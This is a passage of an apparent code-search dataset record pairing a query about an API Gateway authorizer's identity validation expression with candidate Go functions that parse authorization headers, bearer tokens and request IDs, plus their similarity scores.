newCorrelationID)\n\t}\n\treturn newCorrelationID\n}", "func RequestID(ctx context.Context) string {\n\traw := ctx.Value(requestID)\n\tvalue, ok := raw.(*id)\n\tif !ok {\n\t\treturn \"\"\n\t}\n\treturn value.String()\n}", "func ExtracToken(request * http.Request) (string) {\n keys := request.URL.Query()\n token := keys.Get(\"token\")\n \n if token != \"\" {\n\t return token\n }\n\n bearToken := request.Header.Get(\"Authorization\")\n //Authorization the token\n\n strArr := strings.Split(bearToken,\" \")\n if len(strArr) == 2 {\n\t return strArr[1]\n }\n return \"\"\n}", "func (si SignedIdentifiers) RequestID() string {\n\treturn si.rawResponse.Header.Get(\"x-ms-request-id\")\n}", "func (a *Authentication) GetRequestMetadata(context.Context, ...string) (map[string]string, error) {\n return map[string]string{\n \"login\": a.Login,\n \"password\": a.Password,\n }, nil\n}", "func Auth() gin.HandlerFunc {\n\treturn func(c *gin.Context) {\n\t\trawCallerID := mlauth.GetCaller(c.Request)\n\t\tisAdmin := mlauth.IsCallerAdmin(c.Request)\n\n\t\tcallerID, err := strconv.ParseUint(rawCallerID, 10, 64)\n\n\t\t// If request is not from an admin, and we failed parsing caller ID, fail\n\t\tif !isAdmin && err != nil {\n\t\t\terrors.ReturnError(c, &errors.Error{\n\t\t\t\tCode: errors.BadRequestApiError,\n\t\t\t\tCause: \"parsing header value\",\n\t\t\t\tMessage: \"invalid caller.id\",\n\t\t\t\tValues: map[string]string{\n\t\t\t\t\t\"caller.id\": rawCallerID,\n\t\t\t\t},\n\t\t\t})\n\t\t\tc.Abort()\n\t\t\treturn\n\t\t}\n\n\t\tc.Set(\"callerID\", callerID)\n\t\tc.Set(\"isAdmin\", isAdmin)\n\t\tc.Next()\n\t}\n}", "func encodeAuthRequest(_ context.Context, request interface{}) (interface{}, error) {\n\treturn &pb.AuthRequest{}, nil\n}", "func FromRequest(r *http.Request) string {\n\tv := r.Context().Value(contextKey)\n\tif v == nil {\n\t\tlogger.Log().Warn(\"ip.FromRequest was called but ip.Middleware wasn't applied\")\n\t\treturn \"\"\n\t}\n\treturn v.(string)\n}", "func (input *BeegoInput) Header(key string) string {\n\treturn input.Context.Request.Header.Get(key)\n}", "func ExtractUserIDFromHTTPRequest(r *http.Request) (string, context.Context, error) {\n\tuserID := r.Header.Get(UserIDHeaderName)\n\tif userID == \"\" {\n\t\treturn \"\", r.Context(), ErrNoUserID\n\t}\n\treturn userID, InjectUserID(r.Context(), userID), nil\n}", "func Request(r *http.Request) *http.Request {\n\tbt, ok := BearerToken(r.Context())\n\n\tif !ok {\n\t\treturn r\n\t}\n\n\tauthHeaderVal := headerPrefix + bt\n\tr.Header.Set(\"Authorization\", authHeaderVal)\n\treturn r\n}", "func DecodeSummaryRequest(mux goahttp.Muxer, decoder func(*http.Request) goahttp.Decoder) func(*http.Request) (any, error) {\n\treturn func(r *http.Request) (any, error) {\n\t\tvar (\n\t\t\ttoken string\n\t\t\terr error\n\t\t)\n\t\ttoken = r.Header.Get(\"Authorization\")\n\t\tif token == \"\" {\n\t\t\terr = goa.MergeErrors(err, goa.MissingFieldError(\"token\", \"header\"))\n\t\t}\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\tpayload := NewSummaryPayload(token)\n\t\tif strings.Contains(payload.Token, \" \") {\n\t\t\t// Remove authorization scheme prefix (e.g. \"Bearer\")\n\t\t\tcred := strings.SplitN(payload.Token, \" \", 2)[1]\n\t\t\tpayload.Token = cred\n\t\t}\n\n\t\treturn payload, nil\n\t}\n}", "func RequestID(ctx context.Context) string {\n\tif ctx == nil {\n\t\treturn \"\"\n\t}\n\n\tval, _ := ctx.Value(reqidKey).(string)\n\treturn val\n}", "func (b bearerAuth) GetRequestMetadata(ctx context.Context, in ...string) (map[string]string, error) {\n\treturn map[string]string{\n\t\t\"authorization\": \"Bearer \" + b.sessionToken,\n\t}, nil\n}", "func (a *Authentication) GetRequestMetadata(context.Context, ...string) (map[string]string, error) {\n\treturn map[string]string{\n\t\t\"identifier\": a.Identifier,\n\t\t\"jwt\": a.JWT,\n\t}, nil\n}", "func (ctx *HijackRequest) Header(key string) string {\n\treturn ctx.event.Request.Headers[key].String()\n}", "func (c *Client) GetAuthorizationHeader(req *http.Request) string {\n\treturn \"FC \" + c.accessKeyID + \":\" + c.GetSignature(req)\n}", "func (r *Request) Bearer() string {\n\ts := r.Authorization()\n\tl := strings.Split(s, \" \")\n\tif len(l) != 2 {\n\t\treturn \"\"\n\t}\n\tif l[0] == \"Bearer\" {\n\t\treturn l[1]\n\t}\n\treturn \"\"\n}", "func getTokenHeader(c *gin.Context) (string, error) {\n\ttokenString := c.GetHeader(\"Authorization\")\n\tif strings.Index(tokenString, \"Bearer \") != 0 {\n\t\treturn \"\", errors.Unauthorized\n\t}\n\treturn tokenString[7:], nil\n}", "func authHeaderValue(oauthParams map[string]string) string {\n\tpairs := sortParameters(encodeParameters(oauthParams), `%s=\"%s\"`)\n\treturn \"OAuth \" + strings.Join(pairs, \", \")\n}", "func (h RequestMessageHeader) RequestID() interface{} {\n\treturn h.ID\n}", "func GetRequestedUser(c *gin.Context) string {\n\tif c.Keys == nil {\n\t\treturn \"\"\n\t}\n\n\tu, ok := c.Keys[\"reqUser\"].(string)\n\n\tif !ok {\n\t\treturn \"\"\n\t}\n\n\treturn u\n}", "func (c *Ctx) Header(s string) string {\n\treturn c.Req.Header.Get(s)\n}", "func (c *BearerCredentials) GetRequestMetadata(ctx context.Context, uri ...string) (map[string]string, error) {\n\treturn map[string]string{\"authorization\": \"Bearer \" + c.token}, nil\n}", "func (o *RequestIDOptions) RequestIDHeader() string {\n\treturn o.requestIDHeader\n}", "func (s *UnauthorizedOperationException) RequestID() string {\n\treturn s.RespMetadata.RequestID\n}", "func FromAuthHeader(r *http.Request) (string, error) {\n\tauthHeader := r.Header.Get(\"Authorization\")\n\tif authHeader == \"\" {\n\t\treturn \"\", nil // No error, just no token\n\t}\n\n\t// TODO: Make this a bit more robust, parsing-wise\n\tauthHeaderParts := strings.Split(authHeader, \" \")\n\tif len(authHeaderParts) != 2 || strings.ToLower(authHeaderParts[0]) != \"bearer\" {\n\t\treturn \"\", errors.New(\"Authorization header format must be Bearer {token}\")\n\t}\n\n\treturn authHeaderParts[1], nil\n}", "func SignedUserName(req *http.Request) string {\n\tif v, ok := req.Context().Value(\"SignedUserName\").(string); ok {\n\t\treturn v\n\t}\n\treturn \"\"\n}", "func extractToken(r *http.Request) string {\n\tbearToken := r.Header.Get(\"Authorization\")\n\n\ttoken := strings.Split(bearToken, \" \")\n\n\tif len(token) == 2 {\n\t\treturn token[1]\n\t}\n\n\treturn \"\"\n}", "func ExtractOrgIDFromHTTPRequest(r *http.Request) (string, context.Context, error) {\n\torgID := r.Header.Get(OrgIDHeaderName)\n\tif orgID == \"\" {\n\t\treturn \"\", r.Context(), ErrNoOrgID\n\t}\n\treturn orgID, InjectOrgID(r.Context(), orgID), nil\n}", "func GetUserID(r *http.Request) string {\n\treturn strx.Or(r.Header.Get(\"X-User\"), r.Header.Get(\"X-User-Id\"))\n}", "func FromAuthHeader(r *http.Request) (string, error) {\n\tauthHeader := r.Header.Get(\"Authorization\")\n\tif authHeader == \"\" {\n\t\treturn \"\", nil // No error, just no token\n\t}\n\n\t// TODO: Make this a bit more robust, parsing-wise\n\tauthHeaderParts := strings.Fields(authHeader)\n\tif len(authHeaderParts) != 2 || strings.ToLower(authHeaderParts[0]) != \"bearer\" {\n\t\treturn \"\", errors.New(\"Authorization header format must be Bearer {token}\")\n\t}\n\n\treturn authHeaderParts[1], nil\n}", "func RequestIDFromContext(ctx context.Context) string {\n\tif ctx == nil {\n\t\treturn \"\"\n\t}\n\tif gCtx, ok := ctx.(*gin.Context); ok {\n\t\tctx = gCtx.Request.Context()\n\t}\n\tif requestId, ok := ctx.Value(requestIdKey).(string); ok {\n\t\treturn requestId\n\t}\n\treturn \"\"\n}", "func extractAuthorizationHeader(key, value string) string {\n\n\t// Authorization token is space separated\n\tparts := strings.Split(value, \" \")\n\n\t// Invalid if we don't have at least two parts\n\tif len(parts) < 2 {\n\t\treturn \"\"\n\t}\n\n\t// Check our authorization scheme is supported\n\tif parts[0] != authorizationScheme {\n\t\treturn \"\"\n\t}\n\n\treturn parts[1]\n}", "func (t *TokenAuth) GetRequestMetadata(ctx context.Context, in ...string) (\n\tmap[string]string, error) {\n\treturn map[string]string{\n\t\t\"authorization\": \"Bearer \" + t.token,\n\t}, nil\n}", "func RequestID() gin.HandlerFunc {\n\treturn func(c *gin.Context) {\n\t\tc.Header(\"X-Request-Id\", uuid.New().String())\n\t\tc.Next()\n\t}\n}", "func AuthUserID(r *http.Request) (string, string, error) {\n\tclaims := &models.Claim{}\n\ttoken, err := request.ParseFromRequestWithClaims(r, request.OAuth2Extractor, claims, func(token *jwt.Token) (interface{}, error) {\n\t\treturn PublicKey, nil\n\t})\n\n\tif err != nil {\n\t\tswitch err.(type) {\n\t\tcase *jwt.ValidationError:\n\t\t\ttypeError := err.(*jwt.ValidationError)\n\n\t\t\tswitch typeError.Errors {\n\t\t\tcase jwt.ValidationErrorExpired:\n\t\t\t\treturn \"\", \"\", lib.ErrTokenExpired\n\n\t\t\tcase jwt.ValidationErrorSignatureInvalid:\n\t\t\t\treturn \"\", \"\", lib.ErrInvalidsignature\n\n\t\t\tdefault:\n\t\t\t\treturn \"\", \"\", err\n\t\t\t}\n\t\t}\n\t}\n\tvar (\n\t\tid string\n\t\trol string\n\t)\n\n\tif token.Valid {\n\t\tid = claims.ID\n\t\trol = claims.Rol\n\t}\n\treturn id, rol, nil\n}", "func Authorization(ctx context.Context) (string, error) {\n\treturn fromMeta(ctx, AuthKey)\n}", "func NewIncomingHeaderMatcher() runtime.HeaderMatcherFunc {\n\treturn func(key string) (string, bool) {\n\t\tkey = textproto.CanonicalMIMEHeaderKey(key)\n\t\tif key == \"X-Request-Id\" {\n\t\t\treturn key, true\n\t\t}\n\n\t\treturn \"\", false\n\t}\n}", "func (csapr ContainersSetAccessPolicyResponse) RequestID() string {\n\treturn csapr.rawResponse.Header.Get(\"x-ms-request-id\")\n}", "func Caller(ctx context.Context) string {\n\tcallerIdentity, _ := ctx.Value(CallerIdentityKey).(string)\n\treturn callerIdentity\n}", "func (m *GraphBaseServiceClient) Identity()(*i79ca23a9ac0659e1330dd29e049fe157787d5af6695ead2ff8263396db68d027.IdentityRequestBuilder) {\n return i79ca23a9ac0659e1330dd29e049fe157787d5af6695ead2ff8263396db68d027.NewIdentityRequestBuilderInternal(m.pathParameters, m.requestAdapter);\n}", "func (m *GraphBaseServiceClient) Identity()(*i79ca23a9ac0659e1330dd29e049fe157787d5af6695ead2ff8263396db68d027.IdentityRequestBuilder) {\n return i79ca23a9ac0659e1330dd29e049fe157787d5af6695ead2ff8263396db68d027.NewIdentityRequestBuilderInternal(m.pathParameters, m.requestAdapter);\n}", "func RequestID(c context.Context) string {\n\tRequestID := c.Value(contextKeyRequestID)\n\tif RequestID == nil {\n\t\treturn \"\"\n\t}\n\treturn RequestID.(string)\n}", "func (ssp StorageServiceProperties) RequestID() string {\n\treturn ssp.rawResponse.Header.Get(\"x-ms-request-id\")\n}", "func logBefore(ctx *Context) {\n\tctx.Input.Data[requestUid] = utils.UUID.Get()\n\tlog.Info(\"A new requesting\", \"host\", ctx.Request.Host, \"method\", ctx.Request.Method,\n\t\t\"url\", ctx.Request.RequestURI, \"remoteAddr\", ctx.Request.RemoteAddr, requestUid, ctx.Input.Data[requestUid])\n\t// more info: User-Agent request-body request-cookie\n}", "func SetRequestUUID(correlationHeader string) gin.HandlerFunc {\n\treturn func(c *gin.Context) {\n\t\tu := c.Request.Header.Get(correlationHeader)\n\t\tif u == \"\" {\n\t\t\tu = uuid.NewV4().String()\n\t\t}\n\t\tcontextLogger := logrus.WithField(\"uuid\", u)\n\t\tc.Set(LogKey, contextLogger)\n\t\tc.Set(ContextKey, u)\n\t}\n}", "func (l *Lambda) RequestHeaderValues(header string) []string {\n\treturn l.r.Header.Values(header)\n}", "func (*IdentityRequest) Descriptor() ([]byte, []int) {\n\treturn file_coolenv_proto_rawDescGZIP(), []int{2}\n}", "func DecodeListMineRequest(mux goahttp.Muxer, decoder func(*http.Request) goahttp.Decoder) func(*http.Request) (interface{}, error) {\n\treturn func(r *http.Request) (interface{}, error) {\n\t\tvar (\n\t\t\tauth string\n\t\t\terr error\n\t\t)\n\t\tauth = r.Header.Get(\"Authorization\")\n\t\tif auth == \"\" {\n\t\t\terr = goa.MergeErrors(err, goa.MissingFieldError(\"Authorization\", \"header\"))\n\t\t}\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\tpayload := NewListMinePayload(auth)\n\t\tif strings.Contains(payload.Auth, \" \") {\n\t\t\t// Remove authorization scheme prefix (e.g. \"Bearer\")\n\t\t\tcred := strings.SplitN(payload.Auth, \" \", 2)[1]\n\t\t\tpayload.Auth = cred\n\t\t}\n\n\t\treturn payload, nil\n\t}\n}", "func DecodeListMineRequest(mux goahttp.Muxer, decoder func(*http.Request) goahttp.Decoder) func(*http.Request) (interface{}, error) {\n\treturn func(r *http.Request) (interface{}, error) {\n\t\tvar (\n\t\t\tauth string\n\t\t\terr error\n\t\t)\n\t\tauth = r.Header.Get(\"Authorization\")\n\t\tif auth == \"\" {\n\t\t\terr = goa.MergeErrors(err, goa.MissingFieldError(\"Authorization\", \"header\"))\n\t\t}\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\tpayload := NewListMinePayload(auth)\n\t\tif strings.Contains(payload.Auth, \" \") {\n\t\t\t// Remove authorization scheme prefix (e.g. \"Bearer\")\n\t\t\tcred := strings.SplitN(payload.Auth, \" \", 2)[1]\n\t\t\tpayload.Auth = cred\n\t\t}\n\n\t\treturn payload, nil\n\t}\n}", "func setCaller(req *http.Request) {\n\treq.Header.Set(_httpHeaderUser, env.AppID)\n}", "func maskAuthorizationHeader(key string, value string) string {\n\tif !strings.EqualFold(key, \"Authorization\") {\n\t\treturn value\n\t}\n\tif len(value) == 0 {\n\t\treturn \"\"\n\t}\n\tvar authType string\n\tif i := strings.Index(value, \" \"); i > 0 {\n\t\tauthType = value[0:i]\n\t} else {\n\t\tauthType = value\n\t}\n\tif !knownAuthTypes.Has(strings.ToLower(authType)) {\n\t\treturn \"<masked>\"\n\t}\n\tif len(value) > len(authType)+1 {\n\t\tvalue = authType + \" <masked>\"\n\t} else {\n\t\tvalue = authType\n\t}\n\treturn value\n}", "func maskAuthorizationHeader(key string, value string) string {\n\tif !strings.EqualFold(key, \"Authorization\") {\n\t\treturn value\n\t}\n\tif len(value) == 0 {\n\t\treturn \"\"\n\t}\n\tvar authType string\n\tif i := strings.Index(value, \" \"); i > 0 {\n\t\tauthType = value[0:i]\n\t} else {\n\t\tauthType = value\n\t}\n\tif !knownAuthTypes.Has(strings.ToLower(authType)) {\n\t\treturn \"<masked>\"\n\t}\n\tif len(value) > len(authType)+1 {\n\t\tvalue = authType + \" <masked>\"\n\t} else {\n\t\tvalue = authType\n\t}\n\treturn value\n}", "func (ba basicAuthCreds) GetRequestMetadata(ctx context.Context, uri ...string) (map[string]string, error) {\n\tvar up string\n\tif upI := ctx.Value(BasicAuthKey); upI != nil {\n\t\tup = upI.(string)\n\t}\n\tif up == \"\" {\n\t\tup = ba.up\n\t}\n\treturn map[string]string{\"authorization\": up}, nil\n}", "func (t traceV2) Request(req *http.Request) (err error) {\n\torigAuth := req.Header.Get(\"Authorization\")\n\n\tif strings.TrimSpace(origAuth) != \"\" {\n\t\t// Authorization (S3 v2 signature) Format:\n\t\t// Authorization: AWS AKIAJVA5BMMU2RHO6IO1:Y10YHUZ0DTUterAUI6w3XKX7Iqk=\n\n\t\t// Set a temporary redacted auth\n\t\treq.Header.Set(\"Authorization\", \"AWS **REDACTED**:**REDACTED**\")\n\n\t\tvar reqTrace []byte\n\t\treqTrace, err = httputil.DumpRequestOut(req, false) // Only display header\n\t\tif err == nil {\n\t\t\tconsole.Debug(string(reqTrace))\n\t\t}\n\n\t\t// Undo\n\t\treq.Header.Set(\"Authorization\", origAuth)\n\t}\n\treturn err\n}", "func (t traceV4) Request(req *http.Request) (err error) {\n\torigAuth := req.Header.Get(\"Authorization\")\n\n\tprintTrace := func() error {\n\t\treqTrace, rerr := httputil.DumpRequestOut(req, false) // Only display header\n\t\tif rerr == nil {\n\t\t\tconsole.Debug(string(reqTrace))\n\t\t}\n\t\treturn rerr\n\t}\n\n\tif strings.TrimSpace(origAuth) != \"\" {\n\t\t// Authorization (S3 v4 signature) Format:\n\t\t// Authorization: AWS4-HMAC-SHA256 Credential=AKIAJNACEGBGMXBHLEZA/20150524/us-east-1/s3/aws4_request, SignedHeaders=host;x-amz-content-sha256;x-amz-date, Signature=bbfaa693c626021bcb5f911cd898a1a30206c1fad6bad1e0eb89e282173bd24c\n\n\t\t// Strip out accessKeyID from: Credential=<access-key-id>/<date>/<aws-region>/<aws-service>/aws4_request\n\t\tregCred := regexp.MustCompile(\"Credential=([A-Z0-9]+)/\")\n\t\tnewAuth := regCred.ReplaceAllString(origAuth, \"Credential=**REDACTED**/\")\n\n\t\t// Strip out 256-bit signature from: Signature=<256-bit signature>\n\t\tregSign := regexp.MustCompile(\"Signature=([[0-9a-f]+)\")\n\t\tnewAuth = regSign.ReplaceAllString(newAuth, \"Signature=**REDACTED**\")\n\n\t\t// Set a temporary redacted auth\n\t\treq.Header.Set(\"Authorization\", newAuth)\n\n\t\terr = printTrace()\n\n\t\t// Undo\n\t\treq.Header.Set(\"Authorization\", origAuth)\n\t} else {\n\t\terr = printTrace()\n\t}\n\treturn err\n}", "func IDFromRequest(r *http.Request, headerName string) (id xid.ID, err error) {\n\tif r == nil {\n\t\treturn\n\t}\n\tid, err = xid.FromString(r.Header.Get(headerName))\n\treturn\n}", "func GenerateClientIDFromRequest(req *http.Request) string {\n\tvar clientID string\n\n\txForwardedFor := req.Header.Get(\"X-FORWARDED-FOR\")\n\tif xForwardedFor != \"\" {\n\t\tclientID = xForwardedFor\n\t} else {\n\t\tipAddressString := req.RemoteAddr\n\t\tipAddressComponents := strings.Split(ipAddressString, \":\")\n\t\tipAddressComponents[len(ipAddressComponents)-1] = \"\"\n\t\tclientID = strings.Join(ipAddressComponents, \":\")\n\t}\n\n\t// fmt.Println(\"IP address determined to be\", ipAddress)\n\n\treturn clientID + req.UserAgent()\n}", "func adaptAuthorization(originalAuth string) string {\n\tif originalAuth == \"\" {\n\t\treturn originalAuth\n\t}\n\tvar prefix, key string\n\tif _, err := fmt.Sscanf(originalAuth, \"%v %v\", &prefix, &key); err != nil {\n\t\treturn originalAuth\n\t}\n\treturn key\n}", "func (s *IpAddressInUse) RequestID() string {\n\treturn s.RespMetadata.RequestID\n}", "func (t *targetrunner) userFromRequest(r *http.Request) (*authRec, error) {\n\tif r == nil {\n\t\treturn nil, nil\n\t}\n\n\ttoken := \"\"\n\ttokenParts := strings.SplitN(r.Header.Get(\"Authorization\"), \" \", 2)\n\tif len(tokenParts) == 2 && tokenParts[0] == tokenStart {\n\t\ttoken = tokenParts[1]\n\t}\n\n\tif token == \"\" {\n\t\t// no token in header = use default credentials\n\t\treturn nil, nil\n\t}\n\n\tauthrec, err := t.authn.validateToken(token)\n\tif err != nil {\n\t\treturn nil, fmt.Errorf(\"Failed to decrypt token [%s]: %v\", token, err)\n\t}\n\n\treturn authrec, nil\n}", "func (*AuthorizeRequest) Descriptor() ([]byte, []int) {\n\treturn file_types_protobuf_authority_authority_proto_rawDescGZIP(), []int{8}\n}", "func (c *context) Identity() entity.Identity {\n\treturn c.id.AgentIdentity()\n}", "func (req *request) Header() *EntrySet {\n return req.header\n}", "func (s *Server) getAuthorisationHeader() (string, string) {\n\treturn \"authorization\", base64.StdEncoding.EncodeToString([]byte(\n\t\tfmt.Sprintf(\"Basic %s:%s\", s.config.ClientID, s.config.ClientSecret),\n\t))\n}", "func AuthorizationHeader(macaroon, discharge string) (string, error) {\n\tvar buf bytes.Buffer\n\n\troot, err := auth.MacaroonDeserialize(macaroon)\n\tif err != nil {\n\t\tlog.Printf(\"Error deserializing macaroon: %v\", err)\n\t\treturn \"\", err\n\t}\n\n\tdischargeMacaroon, err := auth.MacaroonDeserialize(discharge)\n\tif err != nil {\n\t\tlog.Printf(\"Error deserializing discharge: %v\", err)\n\t\treturn \"\", err\n\t}\n\n\tdischargeMacaroon.Bind(root.Signature())\n\n\tserializedMacaroon, err := auth.MacaroonSerialize(root)\n\tif err != nil {\n\t\tlog.Printf(\"Error serializing root macaroon: %v\", err)\n\t\treturn \"\", err\n\t}\n\tserializedDischarge, err := auth.MacaroonSerialize(dischargeMacaroon)\n\tif err != nil {\n\t\tlog.Printf(\"Error serializing discharge macaroon: %v\", err)\n\t\treturn \"\", err\n\t}\n\n\tfmt.Fprintf(&buf, `Macaroon root=\"%s\", discharge=\"%s\"`, serializedMacaroon, serializedDischarge)\n\treturn buf.String(), nil\n}", "func (c *Cache) requestToken(req *http.Request) (string, error) {\n\tauthorization := req.Header.Get(\"Authorization\")\n\tif authorization == \"\" {\n\t\treturn \"\", failure.New(\"request contains no authorization header\")\n\t}\n\tfields := strings.Fields(authorization)\n\tif len(fields) != 2 || fields[0] != \"Bearer\" {\n\t\treturn \"\", failure.New(\"invalid authorization header: %q\", authorization)\n\t}\n\treturn fields[1], nil\n}", "func GetCallerID(request *http.Request) int64 {\n\tif request == nil {\n\t\treturn 0\n\t}\n\n\t//fetch the callerID from the request header\n\tcallerID := request.Header.Get(headerXCallerID)\n\t//convert it into the int64\n\tuserID, err := strconv.ParseInt(callerID, 10, 64)\n\tif err != nil {\n\t\treturn 0\n\t}\n\n\treturn userID //or CallerID\n}", "func authHeader(apiKey string) string {\n\treturn fmt.Sprintf(\"key=%v\", apiKey)\n}", "func (h *AuthCodeHandler) OnRequest(log *zerolog.Logger, request *http.Request) error {\n\tif request.Header.Get(\"Authorization\") == \"\" {\n\t\t// No auth is set, so let's get the token either from a cache\n\t\t// or generate a new one from the issuing server.\n\t\tprofile := cli.GetProfile()\n\n\t\tparams := url.Values{}\n\t\tif h.getParamsFunc != nil {\n\t\t\t// Backward-compatibility with old call style, only used internally.\n\t\t\tparams = h.getParamsFunc(profile)\n\t\t}\n\t\tfor _, name := range h.Params {\n\t\t\tparams.Add(name, profile[name])\n\t\t}\n\n\t\tsource := &AuthorizationCodeTokenSource{\n\t\t\tClientID: h.ClientID,\n\t\t\tAuthorizeURL: h.AuthorizeURL,\n\t\t\tTokenURL: h.TokenURL,\n\t\t\tEndpointParams: &params,\n\t\t\tScopes: h.Scopes,\n\t\t}\n\n\t\t// Try to get a cached refresh token from the current profile and use\n\t\t// it to wrap the auth code token source with a refreshing source.\n\t\trefreshKey := \"profiles.\" + viper.GetString(\"profile\") + \".refresh\"\n\t\trefreshSource := RefreshTokenSource{\n\t\t\tClientID: h.ClientID,\n\t\t\tTokenURL: h.TokenURL,\n\t\t\tEndpointParams: &params,\n\t\t\tRefreshToken: cli.Cache.GetString(refreshKey),\n\t\t\tTokenSource: source,\n\t\t}\n\n\t\treturn TokenHandler(refreshSource, log, request)\n\t}\n\n\treturn nil\n}", "func HeaderProvider(header string) HTTPRequestKeyProvider {\n\treturn func(source interface{}) (string, error) {\n\t\tswitch request := source.(type) {\n\t\tcase *bridge.HttpRequest:\n\t\t\treturn strings.Join(request.Header[header], \"\\n\"), nil\n\t\tcase *http.Request:\n\t\t\treturn strings.Join(request.Header[header], \"\\n\"), nil\n\t\t}\n\t\treturn \"\", fmt.Errorf(\"unsupported request type %T\", source)\n\t}\n}", "func LaunchIDFromRequest(r *http.Request) string {\n\treturn LaunchIDFromContext(r.Context())\n}", "func GetBearerTokenFromReq(ctx types.Context, req *http.Request) string {\n\tm := rxBearer.FindStringSubmatch(\n\t\treq.Header.Get(types.AuthorizationHeader))\n\tif len(m) == 0 {\n\t\treturn \"\"\n\t}\n\treturn m[1]\n}", "func FromAuthHeader(ctx context.Context) (string, error) {\n\tauthHeader := ctx.GetHeader(\"Authorization\")\n\tif authHeader == \"\" {\n\t\treturn \"\", nil // No error, just no token\n\t}\n\n\t// TODO: Make this a bit more robust, parsing-wise\n\tauthHeaderParts := strings.Split(authHeader, \" \")\n\tif len(authHeaderParts) != 2 || strings.ToLower(authHeaderParts[0]) != \"bearer\" {\n\t\treturn \"\", fmt.Errorf(\"Authorization header format must be Bearer {token}\")\n\t}\n\n\treturn authHeaderParts[1], nil\n}", "func (r *AuthorizationRequest) Path() string {\n\tif r.IsResourceRequest() {\n\t\treturn \"__MAGIC__NOMATCH_*_KEY__\"\n\t}\n\treturn r.Spec.NonResourceAttributes.Path\n}", "func Caller(ctx context.Context) token.AuthTokenDetails {\n\treturn token.GetAuthTokenDetailsFromContext(ctx)\n}" ]
[ "0.6037237", "0.56057835", "0.54971004", "0.5475506", "0.54306847", "0.53429914", "0.53171206", "0.53134394", "0.5294382", "0.52697986", "0.5243935", "0.5189092", "0.5154368", "0.5136604", "0.5135017", "0.5102016", "0.50762564", "0.5061965", "0.50589633", "0.5055378", "0.50509906", "0.5048791", "0.50403666", "0.50339985", "0.5028618", "0.50256646", "0.5010887", "0.50081176", "0.5006682", "0.49980122", "0.49848852", "0.49735227", "0.49467617", "0.49382412", "0.49371284", "0.4929121", "0.49260643", "0.49242282", "0.48869184", "0.48850986", "0.48827428", "0.48678744", "0.4865339", "0.48647198", "0.48599806", "0.48569727", "0.4854848", "0.48528343", "0.48349032", "0.48318297", "0.48256153", "0.48174858", "0.48103905", "0.48067734", "0.4805838", "0.48049733", "0.48047432", "0.48020887", "0.47906333", "0.47856656", "0.47772363", "0.4743516", "0.47427204", "0.474149", "0.47398233", "0.47398233", "0.4737076", "0.47344583", "0.47329044", "0.4731944", "0.47259432", "0.47204092", "0.47200584", "0.47200584", "0.47182953", "0.47054714", "0.47054714", "0.46984342", "0.46982256", "0.46974432", "0.46938276", "0.46861526", "0.46832982", "0.46808395", "0.4679514", "0.46658683", "0.46642947", "0.4662463", "0.46624354", "0.46611854", "0.46562028", "0.46516255", "0.46476698", "0.46396238", "0.46353483", "0.46349475", "0.46348754", "0.46315825", "0.46278313", "0.4613342" ]
0.5468022
4
A validation expression for the incoming identity. For `TOKEN` type, this value should be a regular expression. The incoming token from the client is matched against this expression, and will proceed if the token matches. If the token doesn't match, the client receives a 401 Unauthorized response.
func (r *Authorizer) IdentityValidationExpression() pulumi.StringOutput { return (pulumi.StringOutput)(r.s.State["identityValidationExpression"]) }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func TokenValidationMiddleware(context *gin.Context) {\n\tpayload := context.MustGet(SHORT_USER_INFO_KEY)\n\tshortUser := payload.(*entity.ShortUser)\n\terr := mongo.ValidateAuthToken(shortUser.Email, shortUser.Nickname, shortUser.Token)\n\tif err != nil {\n\t\tmessage := *INVALID_TOKEN_MESSAGE\n\t\tmessage.Payload = err\n\t\tcontext.JSON(http.StatusUnauthorized, gin.H{\"message\": message})\n\t\tcontext.Abort()\n\t\treturn\n\t}\n\tcontext.Set(SHORT_USER_INFO_KEY, shortUser)\n}", "func ValidateMiddleware(next http.Handler) http.Handler {\n\tfn := http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {\n\t\tvar token *jwt.Token\n\t\ttoken, err := request.ParseFromRequestWithClaims(r, request.OAuth2Extractor, &authentication.Claim{}, func(token *jwt.Token) (interface{}, error) {\n\t\t\treturn authentication.PublicKey, nil\n\t\t})\n\n\t\tif err != nil {\n\t\t\tresponse.HTTPError(w, r, http.StatusUnauthorized, err.Error())\n\t\t\treturn\n\t\t}\n\n\t\tif !token.Valid {\n\t\t\tresponse.HTTPError(w, r, http.StatusUnauthorized, \"Invalid Token\")\n\t\t\treturn\n\t\t}\n\t\tid := token.Claims.(*authentication.Claim).ID\n\t\tctx := context.WithValue(r.Context(), primitive.ObjectID{}, id)\n\t\tnext.ServeHTTP(w, r.WithContext(ctx))\n\n\t})\n\treturn fn\n\n}", "func ValidateToken(authClient umAPI.UserManagementApiClient) gin.HandlerFunc {\n\treturn func(c *gin.Context) {\n\t\ttoken := c.MustGet(\"encodedToken\").(string)\n\t\tparsedToken, err := authClient.ValidateJWT(context.Background(), &umAPI.JWTRequest{\n\t\t\tToken: token,\n\t\t})\n\t\tif err != nil {\n\t\t\tst := status.Convert(err)\n\t\t\tlogger.Error.Println(st.Message())\n\t\t\tc.JSON(http.StatusUnauthorized, gin.H{\"error\": \"error during token validation\"})\n\t\t\tc.Abort()\n\t\t\treturn\n\t\t}\n\t\tc.Set(\"validatedToken\", parsedToken)\n\t\tc.Next()\n\t}\n}", "func Token(g *gin.Context) {\n\tlog.Println(\"token\")\n\tclientIdStr, ok := g.GetQuery(\"client_id\")\n\tif !ok {\n\t\tg.JSON(400, \"error\")\n\t\treturn\n\t}\n\n\tclientId, err := strconv.Atoi(clientIdStr)\n\tif err != nil {\n\t\tg.JSON(400, \"error\")\n\t\treturn\n\t}\n\n\t// 需要验证 secret id\n\t// ...\n\n\tauthCode := g.Query(\"auth\")\n\tif store[clientId].AuthCode != authCode {\n\t\tg.JSON(400, \"error\")\n\t\treturn\n\t}\n\n\ttoken := \"this.\" + authCode + \".test\"\n\n\tg.JSON(200, token)\n}", "func ValidateToken(tokenString string, w http.ResponseWriter) (Claims, error) {\n\tclaims := Claims{}\n\tjwtKey := []byte(config.Configuration.TokenPrivateKey)\n\n\t// The token string is parsed, decoded and stored into the given Claims struct\n\ttoken, err := jwt.ParseWithClaims(tokenString, &claims,\n\t\tfunc(token *jwt.Token) (interface{}, error) {\n\t\t\treturn jwtKey, nil\n\t\t})\n\n\t// Check if the token has expired according to the expiry time fixed during the sign 